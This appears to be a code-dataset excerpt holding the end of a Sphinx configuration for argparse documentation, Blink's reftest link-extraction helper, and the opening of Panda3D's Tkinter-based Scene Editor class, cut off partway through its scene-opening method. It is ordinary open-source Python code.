# The full version, including alpha/beta/rc tags.
release = '1.2'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'argparsedoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'argparse.tex', u'argparse Documentation',
u'Steven J. Bethard', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'argparse', u'argparse Documentation',
[u'Steven J. Bethard'], 1)
]
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'argparse', u'argparse Documentation', u'Steven J. Bethard',
'argparse', 'One line description of project.', 'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
texinfo_appendices = []
| bsd-3-clause |
dstockwell/blink | Tools/Scripts/webkitpy/layout_tests/reftests/extract_reference_link.py | 196 | 2272 | # Copyright (C) 2011 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Utility module for reftests."""
from HTMLParser import HTMLParser
class ExtractReferenceLinkParser(HTMLParser):
def __init__(self):
HTMLParser.__init__(self)
self.matches = []
self.mismatches = []
def handle_starttag(self, tag, attrs):
if tag != "link":
return
attrs = dict(attrs)
if not "rel" in attrs:
return
if not "href" in attrs:
return
if attrs["rel"] == "match":
self.matches.append(attrs["href"])
if attrs["rel"] == "mismatch":
self.mismatches.append(attrs["href"])
def get_reference_link(html_string):
"""Returns reference links in the given html_string.
Returns:
a tuple of two URL lists, (matches, mismatches).
"""
parser = ExtractReferenceLinkParser()
parser.feed(html_string)
parser.close()
return parser.matches, parser.mismatches
| bsd-3-clause |
mgracer48/panda3d | contrib/src/sceneeditor/sceneEditor.py | 6 | 76216 |
import sys
try: import _tkinter
except: sys.exit("Please install python module 'Tkinter'")
import direct
from direct.directbase.DirectStart import*
from direct.showbase.TkGlobal import spawnTkLoop
from Tkinter import *
from tkFileDialog import *
from direct.directtools.DirectGlobals import *
from direct.tkwidgets.AppShell import*
from SideWindow import*
from duplicateWindow import*
from lightingPanel import *
from seMopathRecorder import *
from seSession import *
from quad import *
from sePlacer import *
from seFileSaver import *
from propertyWindow import *
import seParticlePanel
from collisionWindow import *
from direct.gui.DirectGui import *
from MetadataPanel import *
from seBlendAnimPanel import *
from controllerWindow import *
from AlignTool import *
import os
import string
from direct.tkwidgets import Dial
from direct.tkwidgets import Floater
from direct.tkwidgets import Slider
from direct.actor import Actor
import seAnimPanel
from direct.task import Task
import math
#################################################################
# All scene and windows object will be stored in here.
# So, any event which will or need to change contents
# should be wirtten in here or imported into here!
#################################################################
from dataHolder import* ## Use this thing to Save/load data.
AllScene = dataHolder()
class myLevelEditor(AppShell):
## overridden the basic app info ##
appname = 'Scene Editor - New Scene'
appversion = '1.0'
copyright = ('Copyright 2004 E.T.C. Carnegie Mellon U.' +
' All Rights Reserved')
contactname = 'Jesse Schell, Shalin Shodhan & YiHong Lin'
contactphone = '(412) 268-5791'
contactemail = 'etc-panda3d@lists.andrew.cmu.edu'
frameWidth = 1024
frameHeight = 80
frameIniPosX = 0
frameIniPosY = 0
usecommandarea = 0
usestatusarea = 0
padx = 5
pady = 5
sideWindowCount = 0
## Basic World default setting (For side window)
worldColor = [0,0,0,0]
lightEnable = 1
ParticleEnable = 1
basedriveEnable = 0
collision = 1
backface = 0
texture = 1
wireframe = 0
grid = 0
widgetVis = 0
enableAutoCamera = 1
enableControl = False
controlType = 'Keyboard'
keyboardMapDict = {}
keyboardSpeedDict = {}
Scene=None
isSelect = False
nodeSelected = None
undoDic = {}
redoDic = {}
animPanel = {}
animBlendPanel = {}
propertyWindow = {}
CurrentFileName=None #Holds the current scene file name
CurrentDirName=None # Holds the current file name without extension which is the path where file's data gets saved
Dirty=0 # Keeps track of whether there are any modifications that should be saved
def __init__(self, parent = None, **kw):
base.setBackgroundColor(0,0,0)
self.parent = parent
## Check TkTool is activated! ##
self.wantTK = config.GetBool('want-tk', 0)
if self.wantTK:
pass
else:
taskMgr.remove('tkloop')
spawnTkLoop()
## Set up window frame
INITOPT = Pmw.INITOPT
optiondefs = (
('title', self.appname, None),
)
self.defineoptions(kw, optiondefs)
AppShell.__init__(self, parent)
self.parent.geometry('%dx%d+%d+%d' % (self.frameWidth, self.frameHeight,self.frameIniPosX,self.frameIniPosY))
###### Put th directLabel on the screen to show the selected object Data
self.posLabel = DirectLabel(
relief = None,
pos = (-1.3, 0, 0.90),
text = "Position : X: 00.00 Y: 00.00 Z: 00.00",
color = Vec4(1, 1, 1, 1),
text_scale = 0.05,
text_align = TextNode.ALeft
)
self.hprLabel = DirectLabel(
relief = None,
pos = (-1.3 , 0, 0.80),
text = "Orientation: H: 00.00 P: 00.00 R: 00.00",
color = Vec4(1, 1, 1, 1),
text_scale = 0.05,
text_align = TextNode.ALeft
)
self.scaleLabel = DirectLabel(
relief = None,
pos = (-1.3, 0, 0.70),
text = "Scale : X: 00.00 Y: 00.00 Z: 00.00",
color = Vec4(1, 1, 1, 1),
text_scale = 0.05,
text_align = TextNode.ALeft
)
self.initialiseoptions(myLevelEditor)
self.parent.resizable(False,False) ## Disable the ability to resize for this Window.
######### Set the event handler ##########
self.dataFlowEvents = [
## Event from Side Window
['SW_lightToggle',self.lightToggle],
['SW_collisionToggle',AllScene.toggleCollisionVisable],
['SW_particleToggle',self.toggleParticleVisable],
['SW_close',self.sideWindowClose],
## From Duplication Window
['DW_duplicating',self.duplicationObj],
## From Animation Panel
['AW_AnimationLoad',self.animationLoader],
['AW_removeAnim',self.animationRemove],
['AW_close',self.animPanelClose],
## From Blending Animation Window
['BAW_saveBlendAnim',self.animBlendPanelSave],
['BAW_removeBlendAnim',self.animBlendPanelRemove],
['BAW_renameBlendAnim',self.animBlendPanelRename],
['BAW_close',self.animBlendPanelClose],
## From Lighting Panel
['LP_selectLight', self.lightSelect],
['LP_addLight',self.addLight],
['LP_rename',self.lightRename],
['LP_removeLight',self.removeLight],
['LP_close',self.lightingPanelClose],
## From MotionPath Panel
['mPath_bindPathToNode',AllScene.bindCurveToNode],
['mPath_requestCurveList', self.requestCurveList],
['mPath_close', self.mopathClosed],
## From Property Window
['PW_removeCurveFromNode', AllScene.removeCurveFromNode],
['PW_removeAnimFromNode', AllScene.removeAnimation],
['PW_toggleLight', AllScene.toggleLightNode],
['PW_close', self.closePropertyWindow],
## From collisionWindow
['CW_addCollisionObj', AllScene.addCollisionObject],
## From AlignWindow
['ALW_close', self.closeAlignPanel],
['ALW_align', self.alignObject],
## From controllerWindow
['ControlW_close', self.closeInputPanel],
['ControlW_require', self.requestObjFromControlW],
['ControlW_controlSetting', self.setControlSet],
['ControlW_controlEnable', self.startControl],
['ControlW_controlDisable', self.stopControl],
['ControlW_saveSetting', AllScene.saveControlSetting],
## From Placer
['Placer_close', self.closePlacerPanel],
## From Particle Panel
['ParticlePanle_close', self.closeParticlePanel],
## From SEditor object which is a altered DirectSession
['SEditor-ToggleWidgetVis',self.toggleWidgetVis],
['SEditor-ToggleBackface',self.toggleBackface],
['SEditor-ToggleTexture',self.toggleTexture],
['SEditor-ToggleWireframe',self.toggleWireframe],
['ParticlePanel_Added_Effect',self.addParticleEffect],
['f11',self.loadFromBam],
['f12',self.saveAsBam],
]
#################################
### Collision detection
#################################
self.cTrav = CollisionTraverser()
base.cTrav = self.cTrav
for event in self.dataFlowEvents:
self.accept(event[0], event[1], extraArgs = event[2:])
self.actionEvents = [
# Scene graph explorer functions
['SGE_changeName', self.changeName],
['SGE_Properties', self.openPropertyPanel],
['SGE_Duplicate', self.duplicate],
['SGE_Remove', self.remove],
['SGE_Add Dummy', self.addDummyNode],
['SGE_Add Collision Object', self.addCollisionObj],
['SGE_Metadata', self.openMetadataPanel],
['SGE_Set as Reparent Target', self.setAsReparentTarget],
['SGE_Reparent to Target', self.reparentToNode],
['SGE_Animation Panel', self.openAnimPanel],
['SGE_Blend Animation Panel', self.openBlendAnimPanel],
['SGE_MoPath Panel', self.openMoPathPanel],
['SGE_Align Tool', self.openAlignPanel],
['SGE_Flash', self.flash],
['SGE_madeSelection', self.selectNode],
['select',self.selectNode],
['deselect', self.deSelectNode],
['se_selectedNodePath',self.selectFromScene],
['se_deselectedAll',self.deselectFromScene],
]
''' All messages starting with "SGE_" are generated in seSceneGraphExplorer'''
for event in self.actionEvents:
self.accept(event[0], event[1], extraArgs = event[2:])
camera.toggleVis()
self.selectNode(base.camera) ## Initially, we select camera as the first node...
def appInit(self):
#################################################################
# appInit(self)
# Initialize the application.
# This function will be called when you call AppShell's constructor
#################################################################
### Create SceneEditor Ver. DirectSession
self.seSession = SeSession()
self.seSession.enable()
SEditor.camera.setPos(0,-50,10)
self.placer=None
self.MopathPanel = None
self.alignPanelDict = {}
#self.quadview=QuadView()
self.lightingPanel = None
self.controllerPanel = None
self.particlePanel = None
### Create Side Window
self.sideWindow = sideWindow(worldColor = self.worldColor,
lightEnable = self.lightEnable,
ParticleEnable = self.ParticleEnable,
basedriveEnable = self.basedriveEnable,
collision = self.collision,
backface = self.backface,
texture = self.texture,
wireframe = self.wireframe,
grid = self.grid,
widgetVis = self.widgetVis,
enableAutoCamera = self.enableAutoCamera)
self.sideWindowCount = 1
self.sideWindow.selectPage()
messenger.send('SGE_Update Explorer',[render]) ## Update the Scene Graph
pass
def getPhotoImage(self,name):
modpath = ConfigVariableSearchPath("model-path")
path = modpath.findFile(Filename(name))
return PhotoImage(file=path.toOsSpecific())
def createInterface(self):
# The interior of the toplevel panel
interior = self.interior()
#######################################################
### Creating the Buttons in the window frame
#######################################################
buttonFrame = Frame(interior)
self.image=[]
self.image.append(self.getPhotoImage('models/icons/new.gif'))#0
self.image.append(self.getPhotoImage('models/icons/open.gif'))#1
self.image.append(self.getPhotoImage('models/icons/save.gif'))#2
self.image.append(self.getPhotoImage('models/icons/model.gif'))#3
self.image.append(self.getPhotoImage('models/icons/actor.gif'))#4
self.image.append(self.getPhotoImage('models/icons/placer.gif'))#5
self.image.append(self.getPhotoImage('models/icons/mopath.gif'))#6
self.image.append(self.getPhotoImage('models/icons/lights.gif'))#7
self.image.append(self.getPhotoImage('models/icons/particles.gif'))#8
self.image.append(self.getPhotoImage('models/icons/control.gif'))
self.image.append(self.getPhotoImage('models/icons/help.gif'))#9
self.image.append(self.getPhotoImage('models/icons/blank.gif'))
self.image.append(self.getPhotoImage('models/icons/blank.gif'))
self.image.append(self.getPhotoImage('models/icons/blank.gif'))
self.image.append(self.getPhotoImage('models/icons/blank.gif'))
self.image.append(self.getPhotoImage('models/icons/blank.gif'))
self.image.append(self.getPhotoImage('models/icons/blank.gif'))
self.image.append(self.getPhotoImage('models/icons/blank.gif'))
self.image.append(self.getPhotoImage('models/icons/blank.gif'))
self.image.append(self.getPhotoImage('models/icons/blank.gif'))
self.image.append(self.getPhotoImage('models/icons/blank.gif'))
self.image.append(self.getPhotoImage('models/icons/blank.gif'))
self.image.append(self.getPhotoImage('models/icons/blank.gif'))
i = 0
for element in self.image:
i += 1
button = Button(buttonFrame, image = element, command=lambda n=i : self.buttonPushed(n))
button.pack(fill=X, side = LEFT)
buttonFrame.pack(fill=X, side=LEFT,expand=True)
def buttonPushed(self, buttonIndex):
#################################################################
# buttonPushed(self, buttonNum)
# This function will handle all button events from top level window
# Take the button index as a reference to sence which button has been pushed.
#################################################################
####
#### Change here to process the button event further.
####
if buttonIndex==1: # New Scene
self.newScene()
return
elif buttonIndex==2: # Open Scene
self.openScene()
return
elif buttonIndex==3: # Save Scene
self.saveScene()
return
elif buttonIndex==4: # Load Model
self.loadModel()
return
elif buttonIndex==5: # Load Actor
self.loadActor()
return
elif buttonIndex==6: # Open Placer
self.openPlacerPanel()
return
elif buttonIndex==7: # Open Mopath Panel
self.openMoPathPanel()
return
elif buttonIndex==8: # Open Lighting Panel
self.openLightingPanel()
return
elif buttonIndex==9: # Open Particle Panel
self.openParticlePanel()
return
elif buttonIndex==10:
self.openInputPanel()
return
elif buttonIndex==11: # Help
self.showAbout()
return
elif buttonIndex==12:
print "You haven't defined the function for this Button, Number %d."%buttonIndex
return
elif buttonIndex==13:
print "You haven't defined the function for this Button, Number %d."%buttonIndex
return
elif buttonIndex==14:
print "You haven't defined the function for this Button, Number %d."%buttonIndex
return
elif buttonIndex==15:
print "You haven't defined the function for this Button, Number %d."%buttonIndex
return
elif buttonIndex==16:
print "Your scene will be eliminated within five seconds, Save your world!!!, Number %d."%buttonIndex
return
elif buttonIndex==17:
print "You haven't defined the function for this Button, Number %d."%buttonIndex
return
elif buttonIndex==18:
print "You haven't defined the function for this Button, Number %d."%buttonIndex
return
elif buttonIndex==19:
print "You haven't defined the function for this Button, Number %d."%buttonIndex
return
elif buttonIndex==20:
print "You haven't defined the function for this Button, Number %d."%buttonIndex
return
return
def createMenuBar(self):
# Creates default menus. Can be overridden or simply augmented
# Using button Add below
self.menuBar.addmenuitem('Help', 'command',
'Get information on application',
label='About...', command=self.showAbout)
## Creat stuff inside the "File"
self.menuBar.addmenuitem('File', 'command', 'Creat New Scene',
label='New Scene',
command=self.newScene)
self.menuBar.addmenuitem('File', 'command', 'Open a Scene',
label='Open Scene',
command=self.openScene)
self.menuBar.addmenuitem('File', 'command', 'Save a Scene',
label='Save Scene',
command=self.saveScene)
self.menuBar.addmenuitem('File', 'command', 'Save Scene as...',
label='Save as...',
command=self.saveAsScene)
self.menuBar.addmenuitem('File', 'separator')
self.menuBar.addmenuitem('File', 'command', 'Load Model',
label='Load Model',
command=self.loadModel)
self.menuBar.addmenuitem('File', 'command', 'Load Actor',
label='Load Actor',
command=self.loadActor)
self.menuBar.addmenuitem('File', 'separator')
self.menuBar.addmenuitem('File', 'command', 'Import a Scene',
label='Import...',
command=self.importScene)
self.menuBar.addmenuitem('File', 'separator')
self.menuBar.addmenuitem('File', 'command', 'Quit this application',
label='Exit',
command=self.quit)
## Creat "Edit" on the menu and its stuff
self.menuBar.addmenu('Edit', 'Editting tools')
self.menuBar.addmenuitem('Edit', 'command', 'Un-do',
label='Undo...',
command=self.unDo)
self.menuBar.addmenuitem('Edit', 'command', 'Re-do',
label='Redo...',
command=self.reDo)
self.menuBar.addmenuitem('Edit', 'separator')
self.menuBar.addmenuitem('Edit', 'command', 'Deselect nodepath',
label='Deselect',
command=self.deSelectNode)
self.menuBar.addmenuitem('Edit', 'separator')
self.menuBar.addmenuitem('Edit', 'command', 'Add a Dummy',
label='Add Dummy',
command=self.addDummy)
self.menuBar.addmenuitem('Edit', 'command', 'Duplicate nodepath',
label='Duplicate',
command=self.duplicateNode)
self.menuBar.addmenuitem('Edit', 'command', 'Remove the nodepath',
label='Remove',
command=self.removeNode)
self.menuBar.addmenuitem('Edit', 'command', 'Show the object properties',
label='Object Properties',
command=self.showObjProp)
self.menuBar.addmenuitem('Edit', 'separator')
self.menuBar.addmenuitem('Edit', 'command', 'Show the Camera setting',
label='Camera Setting',
command=self.showCameraSetting)
self.menuBar.addmenuitem('Edit', 'command', 'Render setting',
label='Render Setting',
command=self.showRenderSetting)
## Creat "Panel" on the menu and its stuff
self.menuBar.addmenu('Panel', 'Panel tools')
self.menuBar.addmenuitem('Panel', 'command', 'Open Side Window',
label='Side Window',
command=self.openSideWindow)
self.menuBar.addmenuitem('Panel', 'command', 'Placer Panel',
label='Placer Panel',
command=self.openPlacerPanel)
self.menuBar.addmenuitem('Panel', 'command', 'Animation Panel',
label='Animation Panel',
command=self.openAnimationPanel)
self.menuBar.addmenuitem('Panel', 'command', 'Motion Path Panel',
label='Mopath Panel',
command=self.openMopathPanel)
self.menuBar.addmenuitem('Panel', 'command', 'Lighting Panel',
label='Lighting Panel',
command=self.openLightingPanel)
self.menuBar.addmenuitem('Panel', 'command', 'Particle Panel',
label='Particle Panel',
command=self.openParticlePanel)
self.menuBar.addmenuitem('Panel', 'separator')
self.menuBar.addmenuitem('Panel', 'command', 'Input control Panel',
label='Input device panel',
command=self.openInputPanel)
self.menuBar.pack(fill=X, side = LEFT)
## get "Menu" items in order to control the entry status
self.menuFile = self.menuBar.component('File-menu')
self.menuEdit = self.menuBar.component('Edit-menu')
self.menuPanel = self.menuBar.component('Panel-menu')
## Disable entries when user doesn't select anything
if not self.isSelect:
self.menuEdit.entryconfig('Deselect', state=DISABLED)
self.menuEdit.entryconfig('Add Dummy', state=DISABLED)
self.menuEdit.entryconfig('Duplicate', state=DISABLED)
self.menuEdit.entryconfig('Remove', state=DISABLED)
self.menuEdit.entryconfig('Object Properties', state=DISABLED)
self.menuPanel.entryconfig('Animation Panel', state=DISABLED)
self.menuPanel.entryconfig('Side Window', state=DISABLED)
def onDestroy(self, event):
#################################################################
# If you have open any thing, please rewrite here!
#################################################################
if taskMgr.hasTaskNamed('seMonitorSelectedNode'):
taskMgr.remove('seMonitorSelectedNode')
pass
def closeAllSubWindows(self):
#################################################################
# closeAllSubWindows(self)
# except side window. this function will close all sub window if there is any.
#################################################################
if self.lightingPanel != None:
self.lightingPanel.quit()
if self.placer != None:
self.placer.quit()
if self.MopathPanel != None:
self.MopathPanel.quit()
if self.particlePanel != None:
self.particlePanel.quit()
if self.controllerPanel != None:
self.controllerPanel.quit()
list = self.animPanel.keys()
for index in list:
self.animPanel[index].quit()
list = self.animBlendPanel.keys()
for index in list:
self.animBlendPanel[index].quit()
list = self.propertyWindow.keys()
for index in list:
self.propertyWindow[index].quit()
list = self.alignPanelDict.keys()
for index in list:
self.alignPanelDict[index].quit()
self.animPanel.clear()
self.animBlendPanel.clear()
self.propertyWindow.clear()
self.alignPanelDict.clear()
return
## Processing message events
def makeDirty(self):
self.Dirty=1
def removeLight(self, lightNode):
#################################################################
# removeLight(self, lightNode)
# This function will be called when user try to remove the light from lightingPanel
# (by sending out the message)
# So, in here we will call dataHolder(AllScene) to remove the light
# and return a list contains the newest data of lights in he scene.
# Then, this function will reset the lighting list in the lightingPanel
#################################################################
list = AllScene.removeObj(lightNode)
if self.lightingPanel != None:
self.lightingPanel.updateList(list)
return
def lightRename(self,oName, nName):
#################################################################
# lightRename(self,oName, nName)
# This function will be called when user try to rename the light from lightingPanel
# (by sending out the message)
# So, in here we will call dataHolder(AllScene) to rename the light
# and return a list contains the newest data of lights in he scene.
# Then, this function will reset the lighting list in the lightingPanel
#################################################################
list, lightNode = AllScene.rename(oName, nName)
if self.lightingPanel != None:
self.lightingPanel.updateList(list,lightNode)
return
def lightSelect(self,lightName):
#################################################################
# lightSelect(self,lightName)
# This function will be called when user try to select the light from lightingPanel
# (by sending out the message)
# So, in here we will call dataHolder(AllScene) to get the target light node
# Then, this function will put this light node back into lighting
# panel and update the data on the panel.
#################################################################
lightNode = AllScene.getLightNode(lightName)
if self.lightingPanel != None:
self.lightingPanel.updateDisplay(lightNode)
return
def addLight(self, type):
#################################################################
# addLight(self, type)
# This function will be called when user try to add a light from lightingPanel
# (by sending out the message)
# So, in here we will call dataHolder(AllScene) to create a default light node
# by the type that user assigned.
# Then, this function will put this light node back into lighting
# panel with the newest lighting list and update the data on the panel.
#################################################################
list, lightNode = AllScene.createLight(type = type)
if self.lightingPanel != None:
self.lightingPanel.updateList(list,lightNode)
self.makeDirty()
return
def lightingPanelClose(self):
#################################################################
# lightingPanelClose(self)
# This function will be called when user try to close the lighting panel
# This function will re-config the state of the lighting panel button on the top screen
# And it will set the self.lightingPanel to None
#################################################################
self.menuPanel.entryconfig('Lighting Panel', state=NORMAL)
self.lightingPanel = None
return
def openPropertyPanel(self, nodePath = None):
#################################################################
# openPropertyPanel(self, nodePath = None)
# This function will be called when user try to open a property window
# for one specific node in the scene.
# Here we will call dataHolder to get the basic properties
# we would like to let user to see and cange.
# And then we pass those information into propertyWindow
#################################################################
type, info = AllScene.getInfoOfThisNode(nodePath)
name = nodePath.getName()
if not self.propertyWindow.has_key(name):
self.propertyWindow[name] = propertyWindow(nodePath, type,info )
pass
def closePropertyWindow(self, name):
if self.propertyWindow.has_key(name):
del self.propertyWindow[name]
return
def openMetadataPanel(self,nodePath=None):
print nodePath
self.MetadataPanel=MetadataPanel(nodePath)
pass
def duplicate(self, nodePath = None):
#################################################################
# duplicate(self, nodePath = None)
# This function will be called when user try to open the duplication window
#################################################################
print '----Duplication!!'
if nodePath != None:
self.duplicateWindow = duplicateWindow(nodePath = nodePath)
pass
def remove(self, nodePath = None):
#################################################################
# remove(self, nodePath = None)
# This function will be called when user try to delete a node from scene
#
# For safty issue,
# we will do deselect first then remove the certain node.
#
#################################################################
if nodePath==None:
if self.nodeSelected == None:
return
nodePath = self.nodeSelected
self.deSelectNode()
if AllScene.isLight(nodePath.getName()):
self.removeLight(nodePath)
else:
AllScene.removeObj(nodePath)
pass
def addDummyNode(self, nodepath = None):
#################################################################
# addDummyNode(self, nodepath = None)
# This function will be called when user try to create a dummy node into scene
#
# Here we will call dataHolder to create a dummy node
# and reparent it to the nodePath that user has assigned.
#
#################################################################
AllScene.addDummyNode(nodepath)
self.makeDirty()
pass
def addCollisionObj(self, nodepath = None):
#################################################################
# addCollisionObj(self, nodepath = None)
# This function will be called when user try to create a collision object into the scene
#
# Here we will call collisionWindow to ask user what kind of collision objects they want to have.
# Then, send the information and generated collision object to dataHolder to finish the whole process
# and reparent it to the nodePath that user has assigned.
#
#################################################################
self.collisionWindow = collisionWindow(nodepath)
pass
def setAsReparentTarget(self, nodepath = None):
#################################################################
# setAsReparentTarget(self, nodepath = None)
# This function will be called when user select a nodePaht
# and want to reparent other node under it. (Drom side window pop-up nemu)
#################################################################
SEditor.setActiveParent(nodepath)
return
def reparentToNode(self, nodepath = None):
#################################################################
# reparentToNode(self, nodepath = None)
# This function will be call when user try to reparent a node to
# that node he selected as a reparent target before.
#
# The whole reparent process is handled by seSession,
# which is tunned from DirectSession
#
#################################################################
SEditor.reparent(nodepath, fWrt = 1)
return
def openPlacerPanel(self, nodePath = None):
#################################################################
# openPlacerPanel(self, nodePath = None)
# This function will be call when user try to open a placer panel.
# This call will only success if there is no other placer panel been activated
#################################################################
if(self.placer==None):
self.placer = Placer()
self.menuPanel.entryconfig('Placer Panel', state=DISABLED)
return
def closePlacerPanel(self):
#################################################################
# closePlacerPanel(self)
# This function will be called when user close the placer panel.
# Here we will reset the self.placer back to None.
# (You can think this is just like a reference count)
#################################################################
self.placer = None
self.menuPanel.entryconfig('Placer Panel', state=NORMAL)
return
def openAnimPanel(self, nodePath = None):
#################################################################
# openAnimPanel(self, nodePath = None)
# This function will be called when user tries to open an Animation Panel
# This will generated a panel and put it
# into a dictionary using the actor's name as an index.
# So, if there already has an animation panel for the target actor,
# it won't allow user to open another one.
#################################################################
name = nodePath.getName()
if AllScene.isActor(name):
if self.animPanel.has_key(name):
print '---- You already have an animation panel for this Actor!'
return
else:
Actor = AllScene.getActor(name)
self.animPanel[name] = seAnimPanel.AnimPanel(aNode=Actor)
pass
def openMoPathPanel(self, nodepath = None):
#################################################################
# openMoPathPanel(self, nodepath = None)
# This function will open a Motion Path Recorder for you.
#################################################################
if self.MopathPanel == None:
self.MopathPanel = MopathRecorder()
pass
def mopathClosed(self):
self.MopathPanel = None
return
def changeName(self, nodePath, nName):
#################################################################
# changeName(self, nodePath, nName)
# This function will be called when user tries to change the name of the node
#################################################################
oName = nodePath.getName() # I need this line in order to check the obj name in the control panel.
AllScene.rename(nodePath,nName)
# reset the list in the controller panel if it has been opened.
if (self.controllerPanel) != None:
list = AllScene.getAllObjNameAsList()
self.controllerPanel.resetNameList(list = list, name = oName, nodePath = nodePath)
return
# Take care things under File menu
def newScene(self):
#################################################################
# newScene(self)
# This function will clear whole stuff in the scene
# and will reset the application title to "New Scene"
#################################################################
self.closeAllSubWindows() ## Close all sub window
if(self.CurrentFileName):
currentF=Filename(self.CurrentFileName)
self.CurrentFileName=None
AllScene.resetAll()
currentModName=currentF.getBasenameWoExtension()
# Let us actually remove the scene from sys modules... this is done because every scene is loaded as a module
# And if we reload a scene python wont reload since its already in sys.modules... and hence we delete it
# If there is ever a garbage colleciton bug..this might be a point to look at
if sys.modules.has_key(currentModName):
del sys.modules[currentModName]
print sys.getrefcount(AllScene.theScene)
del AllScene.theScene
else:
AllScene.resetAll()
self.parent.title('Scene Editor - New Scene')
pass
def openScene(self):
#################################################################
# openScene(self)
#################################################################
# In the future try and provide merging of two scenes
if(self.CurrentFileName or self.Dirty):
saveScene = tkMessageBox._show("Load scene","Save the current scene?",icon = tkMessageBox.QUESTION,type = tkMessageBox.YESNOCANCEL)
if (saveScene == "yes"):
self.saveScene()
elif (saveScene == "cancel"):
return
self.closeAllSubWindows() ## Close all sub window
if(self.CurrentFileName):
currentF=Filename(self.CurrentFileName)
AllScene.resetAll()
currentModName=currentF.getBasenameWoExtension()
# Let us actually remove the scene from sys modules... this is done because every scene is loaded as a module
# And if we reload a scene python wont reload since its already in sys.modules... and hence we delete it
# If there is ever a garbage colleciton bug..this might be a point to look at
if sys.modules.has_key(currentModName):
del sys.modules[currentModName]
print sys.getrefcount(AllScene.theScene)
del AllScene.theScene
else:
AllScene.resetAll()
self.CurrentFileName = AllScene.loadScene()
if(self.CurrentFileName==None):
return
thefile=Filename(self.CurrentFileName)
thedir=thefile.getFullpathWoExtension()
